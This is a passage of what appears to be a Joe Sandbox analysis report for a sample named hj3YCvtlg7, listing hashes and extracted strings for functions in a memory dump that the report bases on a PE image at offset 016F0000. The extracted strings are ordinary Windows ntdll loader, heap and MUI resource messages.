                                                                                              • Opcode ID: 526fa3efb6e44a0765825f4fb5f37c448d6c7b5e90e1a8ed0673de6e97b40941
                                                                                              • Instruction ID: bcbe1a320d2ebd5edc350c5e78a5339bc746e8df7e7a3d2501e45a3a26cd2abc
                                                                                              • Opcode Fuzzy Hash: 526fa3efb6e44a0765825f4fb5f37c448d6c7b5e90e1a8ed0673de6e97b40941
                                                                                              • Instruction Fuzzy Hash: 7A71E3B19043159FCB21EF19C888B9BBFA8EF94764F500469FD488B14AD334D589CBD2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              • apphelp.dll, xrefs: 01742462
                                                                                              • LdrpDynamicShimModule, xrefs: 0178A998
                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0178A9A2
                                                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0178A992
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                              • API String ID: 0-176724104
                                                                                              • Opcode ID: af68c29aedbf4c66b0b088be0dfeaef9ddafbabf06e4d26b17a7971867058cc1
                                                                                              • Instruction ID: 5b1b71c2057f22ad524ea62e24e14d29c56bae0c563780150a9632fe815c2e8b
                                                                                              • Opcode Fuzzy Hash: af68c29aedbf4c66b0b088be0dfeaef9ddafbabf06e4d26b17a7971867058cc1
                                                                                              • Instruction Fuzzy Hash: 3F312A77640202ABDB31AF5DD885E6AFBB8FB84714F26005AFD01A7249D7B05A41CB40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              • HEAP: , xrefs: 01733264
                                                                                              • HEAP[%wZ]: , xrefs: 01733255
                                                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0173327D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                              • API String ID: 0-617086771
                                                                                              • Opcode ID: 061dad94a5e6df17c526cb95543c0b923feeab6042300fe9f22b0fe3abeed9c8
                                                                                              • Instruction ID: 6d9ef0ee985e5aafab084fec2d092322e071d686ca71c999b661f3be137bc984
                                                                                              • Opcode Fuzzy Hash: 061dad94a5e6df17c526cb95543c0b923feeab6042300fe9f22b0fe3abeed9c8
                                                                                              • Instruction Fuzzy Hash: 63929A71A046499FEB25CF68C444BAEFBF1FF88300F188099E959AB392D735A945CF50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                              • API String ID: 0-4253913091
                                                                                              • Opcode ID: 62b4da434b645814e0e45186ba4ba17f8dca39d1775f0804cb837393180d3e20
                                                                                              • Instruction ID: 29321822eee6bba1b9de94d38d6221337ff291e1e0c6ee4fc84571cbb21b5b03
                                                                                              • Opcode Fuzzy Hash: 62b4da434b645814e0e45186ba4ba17f8dca39d1775f0804cb837393180d3e20
                                                                                              • Instruction Fuzzy Hash: ABF1BE70A40606DFEB25DF68C894B6AF7F5FF84304F1481A8E5169B386D734EA81CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID: $@
                                                                                              • API String ID: 2994545307-1077428164
                                                                                              • Opcode ID: dcb329dc1fb1b03771abfadf3c46bfbb24f0c9a5df5cad27fb6d66352f472771
                                                                                              • Instruction ID: 7758d3631844b52ac7abe1bbad1c800a5075a946ea4543a1b62b50a0e955725a
                                                                                              • Opcode Fuzzy Hash: dcb329dc1fb1b03771abfadf3c46bfbb24f0c9a5df5cad27fb6d66352f472771
                                                                                              • Instruction Fuzzy Hash: FAC27F716083419FE72ACF28C881BABFBE5AF89754F04896DF999C7241D734D844CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                                              • API String ID: 0-2779062949
                                                                                              • Opcode ID: 18195bd714d1e777f06cde65608d3d29073deef7e9fec82329e3ee7ca454cbb2
                                                                                              • Instruction ID: dc928f80127ced58e0ef87ff949d10475f54df84fb6e50b54ea6b6f822f14ad6
                                                                                              • Opcode Fuzzy Hash: 18195bd714d1e777f06cde65608d3d29073deef7e9fec82329e3ee7ca454cbb2
                                                                                              • Instruction Fuzzy Hash: 28A13E7191162A9BDF329F68CC88BE9F7B8EF48710F1041EAD909A7251D7359E84CF50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              • Failed to allocated memory for shimmed module list, xrefs: 0178A10F
                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0178A121
                                                                                              • LdrpCheckModule, xrefs: 0178A117
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                              • API String ID: 0-161242083
                                                                                              • Opcode ID: 6452f3f4cf98fc84dd1cc9ff705893313fc26eea79fcf157210cd7d3cf937e31
                                                                                              • Instruction ID: 6b33cafa93b402765dddbb133e043f63865cef688884d5d85d4d4edb2d82b718
                                                                                              • Opcode Fuzzy Hash: 6452f3f4cf98fc84dd1cc9ff705893313fc26eea79fcf157210cd7d3cf937e31
                                                                                              • Instruction Fuzzy Hash: EB71DE71A00206DFDB25EF68C984AFEF7F8FB84204F14406DE942EB255E774AA42CB54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                              • API String ID: 0-1334570610
                                                                                              • Opcode ID: be414006958ce051c306843d2d8c435ac6df46970c6e9b48cebc46c540d9592f
                                                                                              • Instruction ID: 2d8cb52d0606861c33f70375b2176dade747ac617b6950b02afe8fd05d503d43
                                                                                              • Opcode Fuzzy Hash: be414006958ce051c306843d2d8c435ac6df46970c6e9b48cebc46c540d9592f
                                                                                              • Instruction Fuzzy Hash: E761CE70600301DFDB29DF28C844B6AFBE1FF85308F148599E4498F296D770E981CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              • Failed to reallocate the system dirs string !, xrefs: 017982D7
                                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 017982DE
                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 017982E8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                              • API String ID: 0-1783798831
                                                                                              • Opcode ID: 269372401ed8d4db53268a4c3476bd900d2167a89f271692cc105e4977fbde1c
                                                                                              • Instruction ID: 69bde59306c79a7395239508ad7fd6823f835fa1ea3607fcc5cc1d038a67e0e1
                                                                                              • Opcode Fuzzy Hash: 269372401ed8d4db53268a4c3476bd900d2167a89f271692cc105e4977fbde1c
                                                                                              • Instruction Fuzzy Hash: 4E41F372544305ABD722EB68DC48B5BF7ECEF48A50F10492AF955D3299E7B0D900CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              • @, xrefs: 017DC1F1
                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 017DC1C5
                                                                                              • PreferredUILanguages, xrefs: 017DC212
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                              • API String ID: 0-2968386058
                                                                                              • Opcode ID: 4b814b5e3e37f7bcf8e4c098e9275b7e9808212f70324ff0982c34a2e18d5c85
                                                                                              • Instruction ID: 2744613aea18f2d4fcb337b72f6fa15084ce138cda665eac1e1fdaa9dd50c5f5
                                                                                              • Opcode Fuzzy Hash: 4b814b5e3e37f7bcf8e4c098e9275b7e9808212f70324ff0982c34a2e18d5c85
                                                                                              • Instruction Fuzzy Hash: 23416371E0420DEBDB12DAD8C895FEEFBBDAB18700F14416EEA09B7244D774AA44CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                              • API String ID: 0-1373925480
                                                                                              • Opcode ID: 515579f8ab8152fa82f5f1732b57a79be4200f95fc45834dee2c64bdd5f09a34
                                                                                              • Instruction ID: f8fa6b3dccd98f52f59df9a17c2f3ca44820691accc96306994187fa7b2ed058
                                                                                              • Opcode Fuzzy Hash: 515579f8ab8152fa82f5f1732b57a79be4200f95fc45834dee2c64bdd5f09a34
                                                                                              • Instruction Fuzzy Hash: 2A41F431A04658CBEB26DB99C888BEDFBB8FF95340F140469D903EB796D7349941CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 017A4888
                                                                                              • LdrpCheckRedirection, xrefs: 017A488F
                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 017A4899
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                              • API String ID: 0-3154609507
                                                                                              • Opcode ID: b46b5da07d54777afab50feeec9354a20c09631ec7043561f3f0a17507323c3e
                                                                                              • Instruction ID: 09272011ce66559ef06b665e42738e439b865f3bc093614727b83b3845bac2c1
                                                                                              • Opcode Fuzzy Hash: b46b5da07d54777afab50feeec9354a20c09631ec7043561f3f0a17507323c3e
                                                                                              • Instruction Fuzzy Hash: 5241D332A442919FCB21CE1CE840A26FBE4EFC9A50F49076DED4AD7215D7B2D800CB81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                              • API String ID: 0-2558761708
                                                                                              • Opcode ID: 87542aeba5acd1e7d055acadcfbb066c3239633e015d3f1c0fd13a17bf9898b3
                                                                                              • Instruction ID: 675aeddb6bd654cf8152107888ce909b9f089d7b66c6cefb89aa40b4b5abe9e9
                                                                                              • Opcode Fuzzy Hash: 87542aeba5acd1e7d055acadcfbb066c3239633e015d3f1c0fd13a17bf9898b3
                                                                                              • Instruction Fuzzy Hash: 3911AC32395142DFDB29EA1CC859B6AF3A5EF80616F1881A9F40ACB65ADB30D841CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 017A2104
                                                                                              • Process initialization failed with status 0x%08lx, xrefs: 017A20F3
                                                                                              • LdrpInitializationFailure, xrefs: 017A20FA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                              • API String ID: 0-2986994758
                                                                                              • Opcode ID: 36f83d614d1e48cce970d1b8153e00c22428edc27ec49dbff6a4bc9c7bbd808a
                                                                                              • Instruction ID: aba1b627513cf19e9f75397be503d447c436f93d16b0204a25c0910851822c3b
                                                                                              • Opcode Fuzzy Hash: 36f83d614d1e48cce970d1b8153e00c22428edc27ec49dbff6a4bc9c7bbd808a
                                                                                              • Instruction Fuzzy Hash: 3FF0FC76780309BBE725D64CDC5AF99B7ACFB81B54F90046DFB00772C6D5B0A640CA51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: #%u
                                                                                              • API String ID: 48624451-232158463
                                                                                              • Opcode ID: 90bbda21c5f6cc3c504df7270ca4d87435bcc0373c26f78fab9371f111f3799a
                                                                                              • Instruction ID: c6dae95a90671388209164b7f2a108ee5cbe164f6dc5b3dfb6bb940baae24d97
                                                                                              • Opcode Fuzzy Hash: 90bbda21c5f6cc3c504df7270ca4d87435bcc0373c26f78fab9371f111f3799a
                                                                                              • Instruction Fuzzy Hash: 8D715971A0014A9FDB11DFA8C994FAEFBF8BF48704F144065E905E7256EA78EE41CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              • LdrResSearchResource Exit, xrefs: 0172AA25
                                                                                              • LdrResSearchResource Enter, xrefs: 0172AA13
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                              • API String ID: 0-4066393604
                                                                                              • Opcode ID: f0851d7fa35336b496b1da40b739ea430652871fa4fece9d03b7337824f811df
                                                                                              • Instruction ID: 5c86fc2b37721d00ee9ebf37d6f4eb1811ad5a57431af5b2108e2b5e93df3245
                                                                                              • Opcode Fuzzy Hash: f0851d7fa35336b496b1da40b739ea430652871fa4fece9d03b7337824f811df
                                                                                              • Instruction Fuzzy Hash: 0BE17E71E40269AFEB22DE9CC984BAEFBBAFF14710F10446AE901E7651D734D942CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: `$`
                                                                                              • API String ID: 0-197956300
                                                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                              • Instruction ID: bed465f9165ee9c69c1ca7c9f8acdab98f908a023f900b2423c7336cc770c5a9
                                                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                              • Instruction Fuzzy Hash: FAC1C1312043429BEB25CF28C849B6BFBE5AFD8318F184A2DF696CB291D774D505CB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID: Legacy$UEFI
                                                                                              • API String ID: 2994545307-634100481
                                                                                              • Opcode ID: c5e99d15303baae47ca3e29a68afa18a987e7220b2fd1f58a5966dfbbbd3f3b9
                                                                                              • Instruction ID: 065c3699c00c5f04cb40dc7058710cceebe46d6c75e7407d6f24422f1acb81e7
                                                                                              • Opcode Fuzzy Hash: c5e99d15303baae47ca3e29a68afa18a987e7220b2fd1f58a5966dfbbbd3f3b9
                                                                                              • Instruction Fuzzy Hash: 5C615871E407199FDB24DFA8D844BAEFBB9FB48700F14406DE649EB291DB31A944CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @$MUI
                                                                                              • API String ID: 0-17815947
                                                                                              • Opcode ID: fe58a87666f7d0f49e15d3bfe93412df10a64a712559aedc44cbf0d7de2e8249
                                                                                              • Instruction ID: f8de8f86df775d5018cd26ca86befbc7f8d8503946e7820aa37758b90c3312ba
                                                                                              • Opcode Fuzzy Hash: fe58a87666f7d0f49e15d3bfe93412df10a64a712559aedc44cbf0d7de2e8249
                                                                                              • Instruction Fuzzy Hash: 75511871E0021DAEDB11DFA9CC94AEEFBBCEB54B54F100529EA11B7290D7309A05CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              • kLsE, xrefs: 01720540
                                                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0172063D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                              • API String ID: 0-2547482624
                                                                                              • Opcode ID: 6436ab65d4ed9c6f0ddd396acf2115b528fe362207e74a95b852018dc95dfaa4
                                                                                              • Instruction ID: e28f8e93adf7a3a0787b8c05ee6ac45ee5116a9e94557eb56b6f5c8948f07373
                                                                                              • Opcode Fuzzy Hash: 6436ab65d4ed9c6f0ddd396acf2115b528fe362207e74a95b852018dc95dfaa4
                                                                                              • Instruction Fuzzy Hash: 53519C715047528FD734DF69C544AA7FBE4AF84304F20483EFAAA87241E7749546CFA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 0172A309
                                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 0172A2FB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                              • API String ID: 0-2876891731
                                                                                              • Opcode ID: 7f86f1ca255b65a9fa8c5f8a96d389c9e2a2c75443de88b8eb20294f0901387d
                                                                                              • Instruction ID: a97f029b315711bd60d75fbc3a913aacd86ffe127a9ecfaecc8e1e0fdcdc8ea5
                                                                                              • Opcode Fuzzy Hash: 7f86f1ca255b65a9fa8c5f8a96d389c9e2a2c75443de88b8eb20294f0901387d
                                                                                              • Instruction Fuzzy Hash: 2C41CC31A01669DBDB21DF69C844B6EFBB4FF84700F2440A9E900DB693E2B5D941CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID: Cleanup Group$Threadpool!
                                                                                              • API String ID: 2994545307-4008356553
                                                                                              • Opcode ID: 1c30285a0538e7fc8715f07f6d864b96811073b7a29afebc4c834441be576b85
                                                                                              • Instruction ID: bee52fb0c18b88431526460da0bd155e611e97da8c9603a898ac1adce85c60f2
                                                                                              • Opcode Fuzzy Hash: 1c30285a0538e7fc8715f07f6d864b96811073b7a29afebc4c834441be576b85
                                                                                              • Instruction Fuzzy Hash: 2001F4B2640740AFD351DF24CD49F16B7E8EB94715F058A3DAA49C7190E3B4D904CB56
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: MUI
                                                                                              • API String ID: 0-1339004836
                                                                                              • Opcode ID: 1dbb93d224046157780ce912050a169358675ca603c0fac296a0ff84d89b52c1
                                                                                              • Instruction ID: 334f0514766d71f5b8d0de6f656e11b61c361e683e0fd138e9c2815f41c2e950
                                                                                              • Opcode Fuzzy Hash: 1dbb93d224046157780ce912050a169358675ca603c0fac296a0ff84d89b52c1
                                                                                              • Instruction Fuzzy Hash: DC826B75E002288FEB25CFA9C884BEDFBB5FF58310F148169D959AB355D7309982CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID: 0-3916222277
                                                                                              • Opcode ID: 80afecf5ce689db4cbf6bbfc53c9aa34c1b6e98d144cf924243cc296c8425e95
                                                                                              • Instruction ID: e6fd89486bf55db7baa08dd12fdcf986ebaafdc7ff06a4cab2d0b80dc0653251
                                                                                              • Opcode Fuzzy Hash: 80afecf5ce689db4cbf6bbfc53c9aa34c1b6e98d144cf924243cc296c8425e95
                                                                                              • Instruction Fuzzy Hash: D1919272940219AFEB21DF94CD85FAEFBB8EF58750F540165F600AB195D774AD00CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID: 0-3916222277
                                                                                              • Opcode ID: 5e2dc08243945d72dbb1970f71d5b313dc090f16e32d314ad1eaaa3bdaf691a9
                                                                                              • Instruction ID: 78d84c9edf698a3cf8cdf2bc16bb59007bba98319b16c986d52c20030ad652e1
                                                                                              • Opcode Fuzzy Hash: 5e2dc08243945d72dbb1970f71d5b313dc090f16e32d314ad1eaaa3bdaf691a9
                                                                                              • Instruction Fuzzy Hash: D6917072901649AFDB22ABA5DC48FAFFF7AEF85B50F10002DF501A7251EB74A901CB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: GlobalTags
                                                                                              • API String ID: 0-1106856819
                                                                                              • Opcode ID: 78921aa5910605e59f2cb985d8be83f28cce63a6220b54431d3bad1ab8056cf8
                                                                                              • Instruction ID: b58ee1a6311c1ae20e2d66f15cbf8d822e0e9ea5aff8a023d18d1f09d6bc7bb2
                                                                                              • Opcode Fuzzy Hash: 78921aa5910605e59f2cb985d8be83f28cce63a6220b54431d3bad1ab8056cf8
                                                                                              • Instruction Fuzzy Hash: E47160B5E0020A9FDF28CF9CE590AADFBB1BF48710F14826EF905AB245E7719945CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: .mui
                                                                                              • API String ID: 0-1199573805
                                                                                              • Opcode ID: 1bba803433581530f2d33e745760bf986e85442fe9e5c9bf16f4102a88465cf5
                                                                                              • Instruction ID: b43c0b8c344bcb9c09fb3db9db4954580171aa29c2d3c979181e33ba472d20bc
                                                                                              • Opcode Fuzzy Hash: 1bba803433581530f2d33e745760bf986e85442fe9e5c9bf16f4102a88465cf5
                                                                                              • Instruction Fuzzy Hash: F5519C72D0022ADBDB10DF9DD854AAEFBB4AF08F50F05416EEA12BB254D3349D01CBA4
                                                                                              Uniqueness

